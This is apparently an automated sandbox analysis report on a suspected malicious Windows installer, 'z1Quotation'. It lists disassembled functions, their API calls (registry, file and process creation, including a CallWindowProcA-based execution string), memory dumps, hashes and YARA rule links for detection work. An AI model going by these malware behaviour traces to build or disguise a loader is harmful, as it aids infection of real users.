                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3998f4ff677e2a28fd967959e2ac3c8c60a894ddc10ce73667f75638581f0bdc
                                                                                                                  • Instruction ID: a91bb4cc200132fc25778e59ca7686b797c97bc51d8b4542c245474d2629536f
                                                                                                                  • Opcode Fuzzy Hash: 3998f4ff677e2a28fd967959e2ac3c8c60a894ddc10ce73667f75638581f0bdc
                                                                                                                  • Instruction Fuzzy Hash: 7E816771E04228DBEF28CFA9C8447ADBBB1FB44301F14816AD956BB2C1C7786986DF45
                                                                                                                  Function 00406D59 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a39827da554deefbb075d5643603b7ec0f7fd664818859d3dd537c0b9a0302f3
                                                                                                                  • Instruction ID: 2aa1ebaba52e87031c20b01175d4c002a6061ebbe4803719e222612be2705630
                                                                                                                  • Opcode Fuzzy Hash: a39827da554deefbb075d5643603b7ec0f7fd664818859d3dd537c0b9a0302f3
                                                                                                                  • Instruction Fuzzy Hash: 46712271E04228CFDF28CFA8C844BADBBB1FB44305F15806AD856BB281D7786996DF45
                                                                                                                  Function 00406E77 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 21f2339a97da85029a023d971dc9b52077ac054a6cfc2b5d2826cc986d1fdbbb
                                                                                                                  • Instruction ID: 0e806ef676c0e92932cf2b523a95d0369157d75407989c123deae2f844c61cae
                                                                                                                  • Opcode Fuzzy Hash: 21f2339a97da85029a023d971dc9b52077ac054a6cfc2b5d2826cc986d1fdbbb
                                                                                                                  • Instruction Fuzzy Hash: 6D714471E04228CFDF28CFA8C844BADBBB1FB44305F14806AD856BB281C7786996DF45
                                                                                                                  Function 00406DC3 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e16b17a1d78ada828b9032550462f2227fd61b0e66ffe76fa0258ae7fb859873
                                                                                                                  • Instruction ID: abeb61f6f1fd72badddb853f7a13bb8d8b991a676b8733bf1d84daf68f855e11
                                                                                                                  • Opcode Fuzzy Hash: e16b17a1d78ada828b9032550462f2227fd61b0e66ffe76fa0258ae7fb859873
                                                                                                                  • Instruction Fuzzy Hash: 85714571E04228CFEF28CFA8C8447ADBBB1FB44305F14806AD956BB281C7786996DF45
                                                                                                                  Function 0040330A Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetTickCount.KERNEL32 ref: 0040331E
                                                                                                                    • Part of subcall function 00403489: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403187,?), ref: 00403497
                                                                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403234,00000004,00000000,00000000,0000000C,?,004031AE,000000FF,00000000,00000000,0000000A,?), ref: 00403351
                                                                                                                  • SetFilePointer.KERNELBASE(00006C5D,00000000,00000000,004138F8,00004000,?,00000000,00403234,00000004,00000000,00000000,0000000C,?,004031AE,000000FF,00000000), ref: 0040344C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FilePointer$CountTick
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1092082344-0
                                                                                                                  • Opcode ID: 798ae4cb807969a8f9b20dbfb01d8f4788347d3a684976bc915bde066e73c198
                                                                                                                  • Instruction ID: 5e2760829c16be5b456b2d80c3179de7c6ad0aba997fd416184bbac8d4f32be0
                                                                                                                  • Opcode Fuzzy Hash: 798ae4cb807969a8f9b20dbfb01d8f4788347d3a684976bc915bde066e73c198
                                                                                                                  • Instruction Fuzzy Hash: 9C319E72A00205DBD710BF2AFE849663BACE741356324C13BE914B62F1CB385945CFAD
                                                                                                                  Function 00402595 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025C7
                                                                                                                  • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 004025DA
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsi8284.tmp,00000000,00000011,00000002), ref: 004025F2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Enum$CloseValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 397863658-0
                                                                                                                  • Opcode ID: 417f50e0dc36b601b755ede1854ca579d660d2e7217a5d95a27266ee8b79debb
                                                                                                                  • Instruction ID: 7af551deeb249fce77ef5554b7c2dda59263b98fb5fba8a2876bb3d2f6d05d2c
                                                                                                                  • Opcode Fuzzy Hash: 417f50e0dc36b601b755ede1854ca579d660d2e7217a5d95a27266ee8b79debb
                                                                                                                  • Instruction Fuzzy Hash: 00017571604104AFE7159F54DE98ABF7A68EF81359F20443EF501A61C0D6B44A419639
                                                                                                                  Function 00403202 Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SetFilePointer.KERNELBASE(0000000A,00000000,00000000,00000000,00000000,0000000C,?,004031AE,000000FF,00000000,00000000,0000000A,?), ref: 00403227
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FilePointer
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 973152223-0
                                                                                                                  • Opcode ID: 30e242b14a2b822041ab8f12606bbed43d081868df01e651b14b32d607499233
                                                                                                                  • Instruction ID: bc7567603561231bc2ec1d28084f63335ade027d3a01cf31267e3f63722e5d9c
                                                                                                                  • Opcode Fuzzy Hash: 30e242b14a2b822041ab8f12606bbed43d081868df01e651b14b32d607499233
                                                                                                                  • Instruction Fuzzy Hash: 2931AB7020021AFFDB109F96ED85A9A3FA8EB00355B20847AF914E61D0D738DB51DBA9
                                                                                                                  Function 00402523 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402553
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsi8284.tmp,00000000,00000011,00000002), ref: 004025F2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseQueryValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3356406503-0
                                                                                                                  • Opcode ID: c4662aed3400953769b5cddd40b0194a522b187818b2fb74eda420b64cf76a82
                                                                                                                  • Instruction ID: 49bb908759fb8bb017d3fb13a512c1580aa25bc05373ea9f17fb9975dcb56339
                                                                                                                  • Opcode Fuzzy Hash: c4662aed3400953769b5cddd40b0194a522b187818b2fb74eda420b64cf76a82
                                                                                                                  • Instruction Fuzzy Hash: 8F11C471901209EFDB24CFA4DA685BE7AB4EF01354F20843FF442B62C0D6B84A45EB2D
                                                                                                                  Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                  • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3850602802-0
                                                                                                                  • Opcode ID: 0c5789fd138260514d082d02416d4df913b42f9f9632ac62ea02531d6497fcc4
                                                                                                                  • Instruction ID: f90f8baee40fd2ad2ebd870fe85d102dfcd66f1b25247bd42a8a5a06ccf829ae
                                                                                                                  • Opcode Fuzzy Hash: 0c5789fd138260514d082d02416d4df913b42f9f9632ac62ea02531d6497fcc4
                                                                                                                  • Instruction Fuzzy Hash: 2101F4317202109BE7295F389D04B2A36A8E714315F10823FF895F61F1DA78DC038B4D
                                                                                                                  Function 0040242E Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 0040244F
                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00402458
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseDeleteValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2831762973-0
                                                                                                                  • Opcode ID: f6db219a832ef637ef372272eb48238af496410e9ed4d59353c58796628ff0b8
                                                                                                                  • Instruction ID: ff0f7845b330e122125dd818539576c7ade4d5a6fbd1e0406bbc7b626dbfff84
                                                                                                                  • Opcode Fuzzy Hash: f6db219a832ef637ef372272eb48238af496410e9ed4d59353c58796628ff0b8
                                                                                                                  • Instruction Fuzzy Hash: F1F09632B141149BE730ABF89B4DABE6199AB80354F25443FF502B71C1DAF84E01577E
                                                                                                                  Function 004059A8 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CreateDirectoryA.KERNELBASE(?,?), ref: 004059EA
                                                                                                                  • GetLastError.KERNEL32 ref: 004059F8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1375471231-0
                                                                                                                  • Opcode ID: 6a1283def284ae2da235a8de8de440d50ddb230b130f4cbec3169f4b243e88d9
                                                                                                                  • Instruction ID: a2e8e5f80d48baa0e1b61d4007b7959a8456f92ff25af3cdd85c14644e1f1df8
                                                                                                                  • Opcode Fuzzy Hash: 6a1283def284ae2da235a8de8de440d50ddb230b130f4cbec3169f4b243e88d9
                                                                                                                  • Instruction Fuzzy Hash: DFF0B7B1C10209EBDB01DFA4D549BEFBBF4AF08319F10816AD451B6280D7B982599BA9
                                                                                                                  Function 00401ECA Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 00401EE8
                                                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 00401EF3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$EnableShow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1136574915-0
                                                                                                                  • Opcode ID: 8c59f47eef4bcb22bdbf7ed74a637cc342604ddaa8d90c3e1f788c0fcc7b676e
                                                                                                                  • Instruction ID: 0f17799de0a13627377f6ac9c356f22224f1986192975d2ff8f74210daf3248e
                                                                                                                  • Opcode Fuzzy Hash: 8c59f47eef4bcb22bdbf7ed74a637cc342604ddaa8d90c3e1f788c0fcc7b676e
                                                                                                                  • Instruction Fuzzy Hash: 4FE09232A082049FE714EFA4EA8556D77B0EB90325B30403FF501F10C2CA7449818A6E
                                                                                                                  Function 00405A37 Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00422158,?,user32::CallWindowProcA(i r1 ,i 0,i 0, i 0, i 0),user32::CallWindowProcA(i r1 ,i 0,i 0, i 0, i 0),?,988,00000000), ref: 00405A60
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00405A6D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseCreateHandleProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3712363035-0
                                                                                                                  • Opcode ID: ab581ddd3fda7b37a8f125a330bfa88cdadf53e3127e255e3fee9c89dfd7c3ea
                                                                                                                  • Instruction ID: 5d3449708759553af546353d440bf0489dd2416e92ee43aed371b24ac383cd6a
                                                                                                                  • Opcode Fuzzy Hash: ab581ddd3fda7b37a8f125a330bfa88cdadf53e3127e255e3fee9c89dfd7c3ea
                                                                                                                  • Instruction Fuzzy Hash: E7E0BFB460020ABFEB109F64ED49F7B776CE700644F518465BE50F2251D67498658A78
                                                                                                                  Function 00401574 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • ShowWindow.USER32(0001043A), ref: 00401586
                                                                                                                  • ShowWindow.USER32(00010434), ref: 0040159B
                                                                                                                  Memory Dump Source
